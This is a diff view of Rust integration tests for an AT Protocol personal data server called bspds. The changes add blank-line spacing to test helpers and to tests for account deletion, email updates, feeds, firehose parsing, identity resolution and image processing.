··· 14 use tokio::net::TcpListener; 15 use wiremock::matchers::{method, path}; 16 use wiremock::{Mock, MockServer, ResponseTemplate}; 17 static SERVER_URL: OnceLock<String> = OnceLock::new(); 18 static APP_PORT: OnceLock<u16> = OnceLock::new(); 19 static MOCK_APPVIEW: OnceLock<MockServer> = OnceLock::new(); 20 #[cfg(not(feature = "external-infra"))] 21 use testcontainers::core::ContainerPort; 22 #[cfg(not(feature = "external-infra"))] ··· 27 static DB_CONTAINER: OnceLock<ContainerAsync<Postgres>> = OnceLock::new(); 28 #[cfg(not(feature = "external-infra"))] 29 static S3_CONTAINER: OnceLock<ContainerAsync<GenericImage>> = OnceLock::new(); 30 #[allow(dead_code)] 31 pub const AUTH_TOKEN: &str = "test-token"; 32 #[allow(dead_code)] ··· 35 pub const AUTH_DID: &str = "did:plc:fake"; 36 #[allow(dead_code)] 37 pub const TARGET_DID: &str = "did:plc:target"; 38 fn has_external_infra() -> bool { 39 std::env::var("BSPDS_TEST_INFRA_READY").is_ok() 40 || (std::env::var("DATABASE_URL").is_ok() && std::env::var("S3_ENDPOINT").is_ok()) ··· 54 .args(&["container", "prune", "-f", "--filter", "label=bspds_test=true"]) 55 .output(); 56 } 57 #[allow(dead_code)] 58 pub fn client() -> Client { 59 Client::new() 60 } 61 #[allow(dead_code)] 62 pub fn app_port() -> u16 { 63 *APP_PORT.get().expect("APP_PORT not initialized") 64 } 65 pub async fn base_url() -> &'static str { 66 SERVER_URL.get_or_init(|| { 67 let (tx, rx) = std::sync::mpsc::channel(); ··· 94 rx.recv().expect("Failed to start test server") 95 }) 96 } 97 async fn setup_with_external_infra() -> String { 98 let database_url = std::env::var("DATABASE_URL") 99 .expect("DATABASE_URL must be set when using external infra"); ··· 114 MOCK_APPVIEW.set(mock_server).ok(); 115 spawn_app(database_url).await 116 } 117 #[cfg(not(feature = "external-infra"))] 118 async fn setup_with_testcontainers() -> String { 119 let s3_container = GenericImage::new("minio/minio", "latest") ··· 177 DB_CONTAINER.set(container).ok(); 178 spawn_app(connection_string).await 179 } 180 #[cfg(feature = "external-infra")] 181 async fn setup_with_testcontainers() -> String { 182 panic!("Testcontainers disabled with external-infra feature. Set DATABASE_URL and S3_ENDPOINT."); 183 } 184 async fn setup_mock_appview(mock_server: &MockServer) { 185 Mock::given(method("GET")) 186 .and(path("/xrpc/app.bsky.actor.getProfile")) ··· 310 .mount(mock_server) 311 .await; 312 } 313 async fn spawn_app(database_url: String) -> String { 314 use bspds::rate_limit::RateLimiters; 315 let pool = PgPoolOptions::new() ··· 342 }); 343 format!("http://{}", addr) 344 } 345 #[allow(dead_code)] 346 pub async fn get_db_connection_string() -> String { 347 base_url().await; ··· 360 } 361 } 362 } 363 #[allow(dead_code)] 364 pub async fn verify_new_account(client: &Client, did: &str) -> String { 365 let conn_str = get_db_connection_string().await; ··· 396 .expect("No accessJwt in confirmSignup response") 397 .to_string() 398 } 399 #[allow(dead_code)] 400 pub async fn upload_test_blob(client: &Client, data: &'static str, mime: &'static str) -> Value { 401 let res = client ··· 413 let body: Value = res.json().await.expect("Blob upload response was not JSON"); 414 body["blob"].clone() 415 } 416 #[allow(dead_code)] 417 pub async fn create_test_post( 418 client: &Client, ··· 463 .to_string(); 464 (uri, cid, rkey) 465 } 466 #[allow(dead_code)] 467 pub async fn create_account_and_login(client: &Client) -> (String, String) { 468 let mut last_error = String::new();
··· 14 use tokio::net::TcpListener; 15 use wiremock::matchers::{method, path}; 16 use wiremock::{Mock, MockServer, ResponseTemplate}; 17 + 18 static SERVER_URL: OnceLock<String> = OnceLock::new(); 19 static APP_PORT: OnceLock<u16> = OnceLock::new(); 20 static MOCK_APPVIEW: OnceLock<MockServer> = OnceLock::new(); 21 + 22 #[cfg(not(feature = "external-infra"))] 23 use testcontainers::core::ContainerPort; 24 #[cfg(not(feature = "external-infra"))] ··· 29 static DB_CONTAINER: OnceLock<ContainerAsync<Postgres>> = OnceLock::new(); 30 #[cfg(not(feature = "external-infra"))] 31 static S3_CONTAINER: OnceLock<ContainerAsync<GenericImage>> = OnceLock::new(); 32 + 33 #[allow(dead_code)] 34 pub const AUTH_TOKEN: &str = "test-token"; 35 #[allow(dead_code)] ··· 38 pub const AUTH_DID: &str = "did:plc:fake"; 39 #[allow(dead_code)] 40 pub const TARGET_DID: &str = "did:plc:target"; 41 + 42 fn has_external_infra() -> bool { 43 std::env::var("BSPDS_TEST_INFRA_READY").is_ok() 44 || (std::env::var("DATABASE_URL").is_ok() && std::env::var("S3_ENDPOINT").is_ok()) ··· 58 .args(&["container", "prune", "-f", "--filter", "label=bspds_test=true"]) 59 .output(); 60 } 61 + 62 #[allow(dead_code)] 63 pub fn client() -> Client { 64 Client::new() 65 } 66 + 67 #[allow(dead_code)] 68 pub fn app_port() -> u16 { 69 *APP_PORT.get().expect("APP_PORT not initialized") 70 } 71 + 72 pub async fn base_url() -> &'static str { 73 SERVER_URL.get_or_init(|| { 74 let (tx, rx) = std::sync::mpsc::channel(); ··· 101 rx.recv().expect("Failed to start test server") 102 }) 103 } 104 + 105 async fn setup_with_external_infra() -> String { 106 let database_url = std::env::var("DATABASE_URL") 107 .expect("DATABASE_URL must be set when using external infra"); ··· 122 MOCK_APPVIEW.set(mock_server).ok(); 123 spawn_app(database_url).await 124 } 125 + 126 #[cfg(not(feature = "external-infra"))] 127 async fn setup_with_testcontainers() -> String { 128 let s3_container = GenericImage::new("minio/minio", "latest") ··· 186 DB_CONTAINER.set(container).ok(); 187 spawn_app(connection_string).await 188 } 189 + 190 #[cfg(feature = "external-infra")] 191 async fn setup_with_testcontainers() -> String { 192 panic!("Testcontainers disabled with external-infra feature. Set DATABASE_URL and S3_ENDPOINT."); 193 } 194 + 195 async fn setup_mock_appview(mock_server: &MockServer) { 196 Mock::given(method("GET")) 197 .and(path("/xrpc/app.bsky.actor.getProfile")) ··· 321 .mount(mock_server) 322 .await; 323 } 324 + 325 async fn spawn_app(database_url: String) -> String { 326 use bspds::rate_limit::RateLimiters; 327 let pool = PgPoolOptions::new() ··· 354 }); 355 format!("http://{}", addr) 356 } 357 + 358 #[allow(dead_code)] 359 pub async fn get_db_connection_string() -> String { 360 base_url().await; ··· 373 } 374 } 375 } 376 + 377 #[allow(dead_code)] 378 pub async fn verify_new_account(client: &Client, did: &str) -> String { 379 let conn_str = get_db_connection_string().await; ··· 410 .expect("No accessJwt in confirmSignup response") 411 .to_string() 412 } 413 + 414 #[allow(dead_code)] 415 pub async fn upload_test_blob(client: &Client, data: &'static str, mime: &'static str) -> Value { 416 let res = client ··· 428 let body: Value = res.json().await.expect("Blob upload response was not JSON"); 429 body["blob"].clone() 430 } 431 + 432 #[allow(dead_code)] 433 pub async fn create_test_post( 434 client: &Client, ··· 479 .to_string(); 480 (uri, cid, rkey) 481 } 482 + 483 #[allow(dead_code)] 484 pub async fn create_account_and_login(client: &Client) -> (String, String) { 485 let mut last_error = String::new();
+10
tests/delete_account.rs
··· 5 use reqwest::StatusCode; 6 use serde_json::{Value, json}; 7 use sqlx::PgPool; 8 async fn get_pool() -> PgPool { 9 let conn_str = get_db_connection_string().await; 10 sqlx::postgres::PgPoolOptions::new() ··· 13 .await 14 .expect("Failed to connect to test database") 15 } 16 async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str, password: &str) -> (String, String) { 17 let res = client 18 .post(format!("{}/xrpc/com.atproto.server.createAccount", base_url)) ··· 30 let jwt = verify_new_account(client, &did).await; 31 (did, jwt) 32 } 33 #[tokio::test] 34 async fn test_delete_account_full_flow() { 35 let client = client(); ··· 86 .expect("Failed to check session"); 87 assert_eq!(session_res.status(), StatusCode::UNAUTHORIZED); 88 } 89 #[tokio::test] 90 async fn test_delete_account_wrong_password() { 91 let client = client(); ··· 129 let body: Value = delete_res.json().await.unwrap(); 130 assert_eq!(body["error"], "AuthenticationFailed"); 131 } 132 #[tokio::test] 133 async fn test_delete_account_invalid_token() { 134 let client = client(); ··· 171 let body: Value = delete_res.json().await.unwrap(); 172 assert_eq!(body["error"], "InvalidToken"); 173 } 174 #[tokio::test] 175 async fn test_delete_account_expired_token() { 176 let client = client(); ··· 221 let body: Value = delete_res.json().await.unwrap(); 222 assert_eq!(body["error"], "ExpiredToken"); 223 } 224 #[tokio::test] 225 async fn test_delete_account_token_mismatch() { 226 let client = client(); ··· 268 let body: Value = delete_res.json().await.unwrap(); 269 assert_eq!(body["error"], "InvalidToken"); 270 } 271 #[tokio::test] 272 async fn test_delete_account_with_app_password() { 273 let client = client(); ··· 327 .expect("Failed to query user"); 328 assert!(user_row.is_none(), "User should be deleted from database"); 329 } 330 #[tokio::test] 331 async fn test_delete_account_missing_fields() { 332 let client = client(); ··· 371 .expect("Failed to send request"); 372 assert_eq!(res3.status(), StatusCode::UNPROCESSABLE_ENTITY); 373 } 374 #[tokio::test] 375 async fn test_delete_account_nonexistent_user() { 376 let client = client();
··· 5 use reqwest::StatusCode; 6 use serde_json::{Value, json}; 7 use sqlx::PgPool; 8 + 9 async fn get_pool() -> PgPool { 10 let conn_str = get_db_connection_string().await; 11 sqlx::postgres::PgPoolOptions::new() ··· 14 .await 15 .expect("Failed to connect to test database") 16 } 17 + 18 async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str, password: &str) -> (String, String) { 19 let res = client 20 .post(format!("{}/xrpc/com.atproto.server.createAccount", base_url)) ··· 32 let jwt = verify_new_account(client, &did).await; 33 (did, jwt) 34 } 35 + 36 #[tokio::test] 37 async fn test_delete_account_full_flow() { 38 let client = client(); ··· 89 .expect("Failed to check session"); 90 assert_eq!(session_res.status(), StatusCode::UNAUTHORIZED); 91 } 92 + 93 #[tokio::test] 94 async fn test_delete_account_wrong_password() { 95 let client = client(); ··· 133 let body: Value = delete_res.json().await.unwrap(); 134 assert_eq!(body["error"], "AuthenticationFailed"); 135 } 136 + 137 #[tokio::test] 138 async fn test_delete_account_invalid_token() { 139 let client = client(); ··· 176 let body: Value = delete_res.json().await.unwrap(); 177 assert_eq!(body["error"], "InvalidToken"); 178 } 179 + 180 #[tokio::test] 181 async fn test_delete_account_expired_token() { 182 let client = client(); ··· 227 let body: Value = delete_res.json().await.unwrap(); 228 assert_eq!(body["error"], "ExpiredToken"); 229 } 230 + 231 #[tokio::test] 232 async fn test_delete_account_token_mismatch() { 233 let client = client(); ··· 275 let body: Value = delete_res.json().await.unwrap(); 276 assert_eq!(body["error"], "InvalidToken"); 277 } 278 + 279 #[tokio::test] 280 async fn test_delete_account_with_app_password() { 281 let client = client(); ··· 335 .expect("Failed to query user"); 336 assert!(user_row.is_none(), "User should be deleted from database"); 337 } 338 + 339 #[tokio::test] 340 async fn test_delete_account_missing_fields() { 341 let client = client(); ··· 380 .expect("Failed to send request"); 381 assert_eq!(res3.status(), StatusCode::UNPROCESSABLE_ENTITY); 382 } 383 + 384 #[tokio::test] 385 async fn test_delete_account_nonexistent_user() { 386 let client = client();
+14
tests/email_update.rs
··· 2 use reqwest::StatusCode; 3 use serde_json::{json, Value}; 4 use sqlx::PgPool; 5 async fn get_pool() -> PgPool { 6 let conn_str = common::get_db_connection_string().await; 7 sqlx::postgres::PgPoolOptions::new() ··· 10 .await 11 .expect("Failed to connect to test database") 12 } 13 async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str) -> String { 14 let res = client 15 .post(format!("{}/xrpc/com.atproto.server.createAccount", base_url)) ··· 26 let did = body["did"].as_str().expect("No did"); 27 common::verify_new_account(client, did).await 28 } 29 #[tokio::test] 30 async fn test_email_update_flow_success() { 31 let client = common::client(); ··· 77 assert!(user.email_pending_verification.is_none()); 78 assert!(user.email_confirmation_code.is_none()); 79 } 80 #[tokio::test] 81 async fn test_request_email_update_taken_email() { 82 let client = common::client(); ··· 98 let body: Value = res.json().await.expect("Invalid JSON"); 99 assert_eq!(body["error"], "EmailTaken"); 100 } 101 #[tokio::test] 102 async fn test_confirm_email_invalid_token() { 103 let client = common::client(); ··· 128 let body: Value = res.json().await.expect("Invalid JSON"); 129 assert_eq!(body["error"], "InvalidToken"); 130 } 131 #[tokio::test] 132 async fn test_confirm_email_wrong_email() { 133 let client = common::client(); ··· 164 let body: Value = res.json().await.expect("Invalid JSON"); 165 assert_eq!(body["message"], "Email does not match pending update"); 166 } 167 #[tokio::test] 168 async fn test_update_email_success_no_token_required() { 169 let client = common::client(); ··· 187 .expect("User not found"); 188 assert_eq!(user.email, Some(new_email)); 189 } 190 #[tokio::test] 191 async fn test_update_email_same_email_noop() { 192 let client = common::client(); ··· 203 .expect("Failed to update email"); 204 assert_eq!(res.status(), StatusCode::OK, "Updating to same email should succeed as no-op"); 205 } 206 #[tokio::test] 207 async fn test_update_email_requires_token_after_pending() { 208 let client = common::client(); ··· 230 let body: Value = res.json().await.expect("Invalid JSON"); 231 assert_eq!(body["error"], "TokenRequired"); 232 } 233 #[tokio::test] 234 async fn test_update_email_with_valid_token() { 235 let client = common::client(); ··· 273 assert_eq!(user.email, Some(new_email)); 274 assert!(user.email_pending_verification.is_none()); 275 } 276 #[tokio::test] 277 async fn test_update_email_invalid_token() { 278 let client = common::client(); ··· 303 let body: Value = res.json().await.expect("Invalid JSON"); 304 assert_eq!(body["error"], "InvalidToken"); 305 } 306 #[tokio::test] 307 async fn test_update_email_already_taken() { 308 let client = common::client(); ··· 324 let body: Value = res.json().await.expect("Invalid JSON"); 325 assert!(body["message"].as_str().unwrap().contains("already in use") || body["error"] == "InvalidRequest"); 326 } 327 #[tokio::test] 328 async fn test_update_email_no_auth() { 329 let client = common::client(); ··· 338 let body: Value = res.json().await.expect("Invalid JSON"); 339 assert_eq!(body["error"], "AuthenticationRequired"); 340 } 341 #[tokio::test] 342 async fn test_update_email_invalid_format() { 343 let client = common::client();
··· 2 use reqwest::StatusCode; 3 use serde_json::{json, Value}; 4 use sqlx::PgPool; 5 + 6 async fn get_pool() -> PgPool { 7 let conn_str = common::get_db_connection_string().await; 8 sqlx::postgres::PgPoolOptions::new() ··· 11 .await 12 .expect("Failed to connect to test database") 13 } 14 + 15 async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str) -> String { 16 let res = client 17 .post(format!("{}/xrpc/com.atproto.server.createAccount", base_url)) ··· 28 let did = body["did"].as_str().expect("No did"); 29 common::verify_new_account(client, did).await 30 } 31 + 32 #[tokio::test] 33 async fn test_email_update_flow_success() { 34 let client = common::client(); ··· 80 assert!(user.email_pending_verification.is_none()); 81 assert!(user.email_confirmation_code.is_none()); 82 } 83 + 84 #[tokio::test] 85 async fn test_request_email_update_taken_email() { 86 let client = common::client(); ··· 102 let body: Value = res.json().await.expect("Invalid JSON"); 103 assert_eq!(body["error"], "EmailTaken"); 104 } 105 + 106 #[tokio::test] 107 async fn test_confirm_email_invalid_token() { 108 let client = common::client(); ··· 133 let body: Value = res.json().await.expect("Invalid JSON"); 134 assert_eq!(body["error"], "InvalidToken"); 135 } 136 + 137 #[tokio::test] 138 async fn test_confirm_email_wrong_email() { 139 let client = common::client(); ··· 170 let body: Value = res.json().await.expect("Invalid JSON"); 171 assert_eq!(body["message"], "Email does not match pending update"); 172 } 173 + 174 #[tokio::test] 175 async fn test_update_email_success_no_token_required() { 176 let client = common::client(); ··· 194 .expect("User not found"); 195 assert_eq!(user.email, Some(new_email)); 196 } 197 + 198 #[tokio::test] 199 async fn test_update_email_same_email_noop() { 200 let client = common::client(); ··· 211 .expect("Failed to update email"); 212 assert_eq!(res.status(), StatusCode::OK, "Updating to same email should succeed as no-op"); 213 } 214 + 215 #[tokio::test] 216 async fn test_update_email_requires_token_after_pending() { 217 let client = common::client(); ··· 239 let body: Value = res.json().await.expect("Invalid JSON"); 240 assert_eq!(body["error"], "TokenRequired"); 241 } 242 + 243 #[tokio::test] 244 async fn test_update_email_with_valid_token() { 245 let client = common::client(); ··· 283 assert_eq!(user.email, Some(new_email)); 284 assert!(user.email_pending_verification.is_none()); 285 } 286 + 287 #[tokio::test] 288 async fn test_update_email_invalid_token() { 289 let client = common::client(); ··· 314 let body: Value = res.json().await.expect("Invalid JSON"); 315 assert_eq!(body["error"], "InvalidToken"); 316 } 317 + 318 #[tokio::test] 319 async fn test_update_email_already_taken() { 320 let client = common::client(); ··· 336 let body: Value = res.json().await.expect("Invalid JSON"); 337 assert!(body["message"].as_str().unwrap().contains("already in use") || body["error"] == "InvalidRequest"); 338 } 339 + 340 #[tokio::test] 341 async fn test_update_email_no_auth() { 342 let client = common::client(); ··· 351 let body: Value = res.json().await.expect("Invalid JSON"); 352 assert_eq!(body["error"], "AuthenticationRequired"); 353 } 354 + 355 #[tokio::test] 356 async fn test_update_email_invalid_format() { 357 let client = common::client();
+7
tests/feed.rs
··· 1 mod common; 2 use common::{base_url, client, create_account_and_login}; 3 use serde_json::json; 4 #[tokio::test] 5 async fn test_get_timeline_requires_auth() { 6 let client = client(); ··· 12 .unwrap(); 13 assert_eq!(res.status(), 401); 14 } 15 #[tokio::test] 16 async fn test_get_author_feed_requires_actor() { 17 let client = client(); ··· 25 .unwrap(); 26 assert_eq!(res.status(), 400); 27 } 28 #[tokio::test] 29 async fn test_get_actor_likes_requires_actor() { 30 let client = client(); ··· 38 .unwrap(); 39 assert_eq!(res.status(), 400); 40 } 41 #[tokio::test] 42 async fn test_get_post_thread_requires_uri() { 43 let client = client(); ··· 51 .unwrap(); 52 assert_eq!(res.status(), 400); 53 } 54 #[tokio::test] 55 async fn test_get_feed_requires_auth() { 56 let client = client(); ··· 65 .unwrap(); 66 assert_eq!(res.status(), 401); 67 } 68 #[tokio::test] 69 async fn test_get_feed_requires_feed_param() { 70 let client = client(); ··· 78 .unwrap(); 79 assert_eq!(res.status(), 400); 80 } 81 #[tokio::test] 82 async fn test_register_push_requires_auth() { 83 let client = client();
··· 1 mod common; 2 use common::{base_url, client, create_account_and_login}; 3 use serde_json::json; 4 + 5 #[tokio::test] 6 async fn test_get_timeline_requires_auth() { 7 let client = client(); ··· 13 .unwrap(); 14 assert_eq!(res.status(), 401); 15 } 16 + 17 #[tokio::test] 18 async fn test_get_author_feed_requires_actor() { 19 let client = client(); ··· 27 .unwrap(); 28 assert_eq!(res.status(), 400); 29 } 30 + 31 #[tokio::test] 32 async fn test_get_actor_likes_requires_actor() { 33 let client = client(); ··· 41 .unwrap(); 42 assert_eq!(res.status(), 400); 43 } 44 + 45 #[tokio::test] 46 async fn test_get_post_thread_requires_uri() { 47 let client = client(); ··· 55 .unwrap(); 56 assert_eq!(res.status(), 400); 57 } 58 + 59 #[tokio::test] 60 async fn test_get_feed_requires_auth() { 61 let client = client(); ··· 70 .unwrap(); 71 assert_eq!(res.status(), 401); 72 } 73 + 74 #[tokio::test] 75 async fn test_get_feed_requires_feed_param() { 76 let client = client(); ··· 84 .unwrap(); 85 assert_eq!(res.status(), 400); 86 } 87 + 88 #[tokio::test] 89 async fn test_register_push_requires_auth() { 90 let client = client();
+6
tests/firehose.rs
··· 8 use serde_json::{json, Value}; 9 use std::io::Cursor; 10 use tokio_tungstenite::{connect_async, tungstenite}; 11 #[derive(Debug, Deserialize)] 12 struct FrameHeader { 13 op: i64, 14 t: String, 15 } 16 #[derive(Debug, Deserialize)] 17 struct CommitFrame { 18 seq: i64, ··· 29 blobs: Vec<Cid>, 30 time: String, 31 } 32 #[derive(Debug, Deserialize)] 33 struct RepoOp { 34 action: String, 35 path: String, 36 cid: Option<Cid>, 37 } 38 fn find_cbor_map_end(bytes: &[u8]) -> Result<usize, String> { 39 let mut pos = 0; 40 fn read_uint(bytes: &[u8], pos: &mut usize, additional: u8) -> Result<u64, String> { ··· 104 skip_value(bytes, &mut pos)?; 105 Ok(pos) 106 } 107 fn parse_frame(bytes: &[u8]) -> Result<(FrameHeader, CommitFrame), String> { 108 let header_len = find_cbor_map_end(bytes)?; 109 let header: FrameHeader = serde_ipld_dagcbor::from_slice(&bytes[..header_len]) ··· 113 .map_err(|e| format!("Failed to parse commit frame: {:?}", e))?; 114 Ok((header, frame)) 115 } 116 #[tokio::test] 117 async fn test_firehose_subscription() { 118 let client = client();
··· 8 use serde_json::{json, Value}; 9 use std::io::Cursor; 10 use tokio_tungstenite::{connect_async, tungstenite}; 11 + 12 #[derive(Debug, Deserialize)] 13 struct FrameHeader { 14 op: i64, 15 t: String, 16 } 17 + 18 #[derive(Debug, Deserialize)] 19 struct CommitFrame { 20 seq: i64, ··· 31 blobs: Vec<Cid>, 32 time: String, 33 } 34 + 35 #[derive(Debug, Deserialize)] 36 struct RepoOp { 37 action: String, 38 path: String, 39 cid: Option<Cid>, 40 } 41 + 42 fn find_cbor_map_end(bytes: &[u8]) -> Result<usize, String> { 43 let mut pos = 0; 44 fn read_uint(bytes: &[u8], pos: &mut usize, additional: u8) -> Result<u64, String> { ··· 108 skip_value(bytes, &mut pos)?; 109 Ok(pos) 110 } 111 + 112 fn parse_frame(bytes: &[u8]) -> Result<(FrameHeader, CommitFrame), String> { 113 let header_len = find_cbor_map_end(bytes)?; 114 let header: FrameHeader = serde_ipld_dagcbor::from_slice(&bytes[..header_len]) ··· 118 .map_err(|e| format!("Failed to parse commit frame: {:?}", e))?; 119 Ok((header, frame)) 120 } 121 + 122 #[tokio::test] 123 async fn test_firehose_subscription() { 124 let client = client();
+1 -1
tests/firehose_validation.rs
··· 1 mod common; 2 - use common::*; 3 4 use cid::Cid; 5 use futures::{stream::StreamExt, SinkExt}; 6 use iroh_car::CarReader;
··· 1 mod common; 2 3 + use common::*; 4 use cid::Cid; 5 use futures::{stream::StreamExt, SinkExt}; 6 use iroh_car::CarReader;
+6
tests/helpers/mod.rs
··· 1 use chrono::Utc; 2 use reqwest::StatusCode; 3 use serde_json::{Value, json}; 4 pub use crate::common::*; 5 #[allow(dead_code)] 6 pub async fn setup_new_user(handle_prefix: &str) -> (String, String) { 7 let client = client(); ··· 40 let new_jwt = verify_new_account(&client, &new_did).await; 41 (new_did, new_jwt) 42 } 43 #[allow(dead_code)] 44 pub async fn create_post( 45 client: &reqwest::Client, ··· 83 let cid = create_body["cid"].as_str().unwrap().to_string(); 84 (uri, cid) 85 } 86 #[allow(dead_code)] 87 pub async fn create_follow( 88 client: &reqwest::Client, ··· 126 let cid = create_body["cid"].as_str().unwrap().to_string(); 127 (uri, cid) 128 } 129 #[allow(dead_code)] 130 pub async fn create_like( 131 client: &reqwest::Client, ··· 167 body["cid"].as_str().unwrap().to_string(), 168 ) 169 } 170 #[allow(dead_code)] 171 pub async fn create_repost( 172 client: &reqwest::Client,
··· 1 use chrono::Utc; 2 use reqwest::StatusCode; 3 use serde_json::{Value, json}; 4 + 5 pub use crate::common::*; 6 + 7 #[allow(dead_code)] 8 pub async fn setup_new_user(handle_prefix: &str) -> (String, String) { 9 let client = client(); ··· 42 let new_jwt = verify_new_account(&client, &new_did).await; 43 (new_did, new_jwt) 44 } 45 + 46 #[allow(dead_code)] 47 pub async fn create_post( 48 client: &reqwest::Client, ··· 86 let cid = create_body["cid"].as_str().unwrap().to_string(); 87 (uri, cid) 88 } 89 + 90 #[allow(dead_code)] 91 pub async fn create_follow( 92 client: &reqwest::Client, ··· 130 let cid = create_body["cid"].as_str().unwrap().to_string(); 131 (uri, cid) 132 } 133 + 134 #[allow(dead_code)] 135 pub async fn create_like( 136 client: &reqwest::Client, ··· 172 body["cid"].as_str().unwrap().to_string(), 173 ) 174 } 175 + 176 #[allow(dead_code)] 177 pub async fn create_repost( 178 client: &reqwest::Client,
+9
tests/identity.rs
··· 4 use serde_json::{Value, json}; 5 use wiremock::matchers::{method, path}; 6 use wiremock::{Mock, MockServer, ResponseTemplate}; 7 #[tokio::test] 8 async fn test_resolve_handle_success() { 9 let client = client(); ··· 39 let body: Value = res.json().await.expect("Response was not valid JSON"); 40 assert_eq!(body["did"], did); 41 } 42 #[tokio::test] 43 async fn test_resolve_handle_not_found() { 44 let client = client(); ··· 56 let body: Value = res.json().await.expect("Response was not valid JSON"); 57 assert_eq!(body["error"], "HandleNotFound"); 58 } 59 #[tokio::test] 60 async fn test_resolve_handle_missing_param() { 61 let client = client(); ··· 69 .expect("Failed to send request"); 70 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 71 } 72 #[tokio::test] 73 async fn test_well_known_did() { 74 let client = client(); ··· 82 assert!(body["id"].as_str().unwrap().starts_with("did:web:")); 83 assert_eq!(body["service"][0]["type"], "AtprotoPersonalDataServer"); 84 } 85 #[tokio::test] 86 async fn test_create_did_web_account_and_resolve() { 87 let client = client(); ··· 145 assert_eq!(doc["verificationMethod"][0]["controller"], did); 146 assert!(doc["verificationMethod"][0]["publicKeyJwk"].is_object()); 147 } 148 #[tokio::test] 149 async fn test_create_account_duplicate_handle() { 150 let client = client(); ··· 178 let body: Value = res.json().await.expect("Response was not JSON"); 179 assert_eq!(body["error"], "HandleTaken"); 180 } 181 #[tokio::test] 182 async fn test_did_web_lifecycle() { 183 let client = client(); ··· 267 assert_eq!(record_body["value"]["displayName"], "DID Web User"); 268 */ 269 } 270 #[tokio::test] 271 async fn test_get_recommended_did_credentials_success() { 272 let client = client(); ··· 296 assert_eq!(body["services"]["atprotoPds"]["type"], "AtprotoPersonalDataServer"); 297 assert!(body["services"]["atprotoPds"]["endpoint"].is_string()); 298 } 299 #[tokio::test] 300 async fn test_get_recommended_did_credentials_no_auth() { 301 let client = client();
··· 4 use serde_json::{Value, json}; 5 use wiremock::matchers::{method, path}; 6 use wiremock::{Mock, MockServer, ResponseTemplate}; 7 + 8 #[tokio::test] 9 async fn test_resolve_handle_success() { 10 let client = client(); ··· 40 let body: Value = res.json().await.expect("Response was not valid JSON"); 41 assert_eq!(body["did"], did); 42 } 43 + 44 #[tokio::test] 45 async fn test_resolve_handle_not_found() { 46 let client = client(); ··· 58 let body: Value = res.json().await.expect("Response was not valid JSON"); 59 assert_eq!(body["error"], "HandleNotFound"); 60 } 61 + 62 #[tokio::test] 63 async fn test_resolve_handle_missing_param() { 64 let client = client(); ··· 72 .expect("Failed to send request"); 73 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 74 } 75 + 76 #[tokio::test] 77 async fn test_well_known_did() { 78 let client = client(); ··· 86 assert!(body["id"].as_str().unwrap().starts_with("did:web:")); 87 assert_eq!(body["service"][0]["type"], "AtprotoPersonalDataServer"); 88 } 89 + 90 #[tokio::test] 91 async fn test_create_did_web_account_and_resolve() { 92 let client = client(); ··· 150 assert_eq!(doc["verificationMethod"][0]["controller"], did); 151 assert!(doc["verificationMethod"][0]["publicKeyJwk"].is_object()); 152 } 153 + 154 #[tokio::test] 155 async fn test_create_account_duplicate_handle() { 156 let client = client(); ··· 184 let body: Value = res.json().await.expect("Response was not JSON"); 185 assert_eq!(body["error"], "HandleTaken"); 186 } 187 + 188 #[tokio::test] 189 async fn test_did_web_lifecycle() { 190 let client = client(); ··· 274 assert_eq!(record_body["value"]["displayName"], "DID Web User"); 275 */ 276 } 277 + 278 #[tokio::test] 279 async fn test_get_recommended_did_credentials_success() { 280 let client = client(); ··· 304 assert_eq!(body["services"]["atprotoPds"]["type"], "AtprotoPersonalDataServer"); 305 assert!(body["services"]["atprotoPds"]["endpoint"].is_string()); 306 } 307 + 308 #[tokio::test] 309 async fn test_get_recommended_did_credentials_no_auth() { 310 let client = client();
+31
tests/image_processing.rs
··· 1 use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE}; 2 use image::{DynamicImage, ImageFormat}; 3 use std::io::Cursor; 4 fn create_test_png(width: u32, height: u32) -> Vec<u8> { 5 let img = DynamicImage::new_rgb8(width, height); 6 let mut buf = Vec::new(); 7 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap(); 8 buf 9 } 10 fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> { 11 let img = DynamicImage::new_rgb8(width, height); 12 let mut buf = Vec::new(); 13 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap(); 14 buf 15 } 16 fn create_test_gif(width: u32, height: u32) -> Vec<u8> { 17 let img = DynamicImage::new_rgb8(width, height); 18 let mut buf = Vec::new(); 19 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap(); 20 buf 21 } 22 fn create_test_webp(width: u32, height: u32) -> Vec<u8> { 23 let img = DynamicImage::new_rgb8(width, height); 24 let mut buf = Vec::new(); 25 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap(); 26 buf 27 } 28 #[test] 29 fn test_process_png() { 30 let processor = ImageProcessor::new(); ··· 33 assert_eq!(result.original.width, 500); 34 assert_eq!(result.original.height, 500); 35 } 36 #[test] 37 fn test_process_jpeg() { 38 let processor = ImageProcessor::new(); ··· 41 assert_eq!(result.original.width, 400); 42 assert_eq!(result.original.height, 300); 43 } 44 #[test] 45 fn test_process_gif() { 46 let processor = ImageProcessor::new(); ··· 49 assert_eq!(result.original.width, 200); 50 assert_eq!(result.original.height, 200); 51 } 52 #[test] 53 fn test_process_webp() { 54 let processor = ImageProcessor::new(); ··· 57 assert_eq!(result.original.width, 300); 58 assert_eq!(result.original.height, 200); 59 } 60 #[test] 61 fn test_thumbnail_feed_size() { 62 let processor = ImageProcessor::new(); ··· 66 assert!(thumb.width <= THUMB_SIZE_FEED); 67 assert!(thumb.height <= THUMB_SIZE_FEED); 68 } 69 #[test] 70 fn test_thumbnail_full_size() { 71 let processor = ImageProcessor::new(); ··· 75 assert!(thumb.width <= THUMB_SIZE_FULL); 76 assert!(thumb.height <= THUMB_SIZE_FULL); 77 } 78 #[test] 79 fn test_no_thumbnail_small_image() { 80 let processor = ImageProcessor::new(); ··· 83 assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail"); 84 